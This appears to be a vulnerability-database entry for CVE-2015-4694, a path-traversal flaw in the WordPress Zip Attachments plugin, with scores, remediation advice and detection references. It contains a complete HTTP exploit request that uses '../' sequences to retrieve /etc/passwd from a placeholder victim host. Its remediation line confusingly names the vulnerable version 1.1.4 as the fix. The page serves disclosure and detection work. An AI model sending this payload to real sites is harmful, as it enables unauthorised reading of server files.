🔙 목록으로 돌아가기

CVE-2015-4694: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval

TitleWordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval
Author0x_Akoko
SeverityHigh
ImpactArbitrary file retrieval
RemediationUpdate to the latest version of the WordPress Zip Attachments plugin (1.1.4) or remove the plugin if not needed.
CVSS Score8.6
EPSS Score0.35068
CVE IDCVE-2015-4694
CWE IDCWE-22
Tags cve2015 cve wp-plugin wpscan lfi wordpress zip_attachments_project vuln

🔍 Vulnerability Description

WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file.

🌐 HTTP Request

GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-4694.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-4694.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A